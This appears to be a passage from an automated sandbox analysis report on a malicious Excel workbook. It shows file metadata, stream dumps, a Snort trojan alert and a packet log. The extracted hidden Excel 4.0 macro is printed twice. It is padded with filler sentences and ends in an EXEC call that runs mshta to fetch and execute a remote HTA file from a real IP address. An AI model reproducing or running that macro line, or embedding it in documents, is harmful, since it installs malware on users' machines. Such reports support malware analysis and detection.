                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                                                                                  Static OLE Info

                                                                                                                                  General

                                                                                                                                  Document Type:OLE
                                                                                                                                  Number of OLE Files:1

                                                                                                                                  OLE File "imedpub_2.xls"

                                                                                                                                  Indicators
                                                                                                                                  Has Summary Info:True
                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                  Encrypted Document:False
                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                  Flash Objects Count:
                                                                                                                                  Contains VBA Macros:True
                                                                                                                                  Summary
                                                                                                                                  Code Page:1251
                                                                                                                                  Author:xXx
                                                                                                                                  Last Saved By:xXx
                                                                                                                                  Create Time:2022-01-27 11:58:35
                                                                                                                                  Last Saved Time:2022-01-27 13:02:02
                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                  Security:0
                                                                                                                                  Document Summary
                                                                                                                                  Document Code Page:1251
                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                  Company:
                                                                                                                                  Contains Dirty Links:False
                                                                                                                                  Shared Document:False
                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                  Application Version:1048576

                                                                                                                                  Streams

                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                  General
                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                  File Type:data
                                                                                                                                  Stream Size:4096
                                                                                                                                  Entropy:0.347239233907
                                                                                                                                  Base64 Encoded:False
                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
                                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b8 00 00 00
                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                  General
                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                  File Type:data
                                                                                                                                  Stream Size:4096
                                                                                                                                  Entropy:0.263263729974
                                                                                                                                  Base64 Encoded:False
                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . D 6 u . . . @ . . . . . j . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 147373
                                                                                                                                  General
                                                                                                                                  Stream Path:Workbook
                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                  Stream Size:147373
                                                                                                                                  Entropy:7.45971048702
                                                                                                                                  Base64 Encoded:True
                                                                                                                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                  Macro 4.0 Code

                                                                                                                                  Name:Macro1
                                                                                                                                  Type:3
                                                                                                                                  Final:False
                                                                                                                                  Visible:False
                                                                                                                                  Protected:False
                                                                                                                                  Macro13False0Falsepost2,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.4,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.6,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.7,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.8,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.10,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.12,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.13,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.15,11,' Sudden she seeing garret far regard. By hardly it direct if pretty up regret. Ability thought enquire settled prudent you sir. Or easy knew sold on well come year. Something consulted age extremely end procuring. Collecting preference he inquietude projection me in by. So do of sufficient projecting an thoroughly uncommonly prosperous conviction. Pianoforte principles our unaffected not for astonished travelling are particular.17,11,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.20,11,=EXEC("cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html")26,11,=HALT()
                                                                                                                                  Name:Macro1
                                                                                                                                  Type:3
                                                                                                                                  Final:False
                                                                                                                                  Visible:False
                                                                                                                                  Protected:False
                                                                                                                                  Macro13False0Falsepre2,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.4,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.6,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.7,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.8,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.10,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.12,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.13,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.15,11,' Sudden she seeing garret far regard. By hardly it direct if pretty up regret. Ability thought enquire settled prudent you sir. Or easy knew sold on well come year. Something consulted age extremely end procuring. Collecting preference he inquietude projection me in by. So do of sufficient projecting an thoroughly uncommonly prosperous conviction. Pianoforte principles our unaffected not for astonished travelling are particular.17,11,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.20,11,=EXEC("cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html")26,11,=HALT()

                                                                                                                                  Network Behavior

                                                                                                                                  Snort IDS Alerts

                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  01/28/22-21:04:46.790335TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.168

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 28, 2022 21:04:41.847848892 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.909142017 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.909296036 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.911645889 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.972739935 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.972903013 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.972925901 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.972948074 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.972968102 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.972985029 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973001003 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973006010 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973011971 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973031998 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973053932 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973064899 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973078012 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973093033 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973117113 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973129034 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973145962 CET804916591.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:41.973154068 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.973179102 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:41.979094028 CET4916580192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:46.729155064 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:46.787663937 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:46.787797928 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:46.790334940 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:46.848752022 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:46.848853111 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:46.848866940 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:46.848933935 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:04:46.922265053 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:47.230262995 CET8049167103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:47.230416059 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:47.230521917 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:47.538574934 CET8049167103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:48.596137047 CET8049167103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:48.613080025 CET8049167103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:48.613158941 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:49.015747070 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:49.321938992 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:49.322061062 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:49.322189093 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:49.627801895 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.743541002 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.743566990 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.743668079 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:50.743750095 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.744501114 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.744581938 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:50.745362997 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.746299982 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.746368885 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:50.746504068 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.746525049 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.747564077 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:50.747633934 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:50.747831106 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.007589102 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.049526930 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.049562931 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.049587965 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.049612999 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.049715996 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.050158978 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.050196886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.050221920 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.050239086 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.050249100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.050295115 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.051632881 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.051659107 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.051685095 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.051709890 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.051723003 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.053556919 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.053631067 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.053648949 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.053689957 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.053742886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.053792953 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.053798914 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.053843975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.056880951 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.314318895 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.314409018 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.314485073 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.323955059 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.324057102 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.355350018 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355379105 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355396986 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355413914 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355494976 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.355583906 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355628014 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.355643988 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355777025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356023073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356040955 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356057882 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356074095 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356077909 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356092930 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356101990 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356112003 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356152058 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356158018 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356249094 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356266022 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356307983 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.357264042 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357290030 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357306004 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357321978 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357372046 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362349987 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362375975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362389088 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362401962 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362415075 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362426996 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362440109 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362456083 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362467051 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362483025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362483978 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362495899 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362504005 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362508059 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362509966 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362546921 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362596989 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.363506079 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363533020 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363544941 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363601923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.363678932 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.367794991 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.367818117 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.629568100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629717112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629734993 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629786968 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.629875898 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629945993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661187887 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661216021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661232948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661267042 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661317110 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661370993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661395073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661412954 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661427021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661442995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661454916 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661458015 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661474943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661492109 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661555052 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.662337065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663602114 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663665056 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.663676977 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663742065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663796902 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.663877010 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663894892 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663929939 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673650026 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673705101 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673722029 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673758984 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673768044 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673787117 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673806906 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673836946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673877954 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673896074 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673908949 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673922062 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673923969 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673933029 CET4916880192.168.2.22103.138.189.128
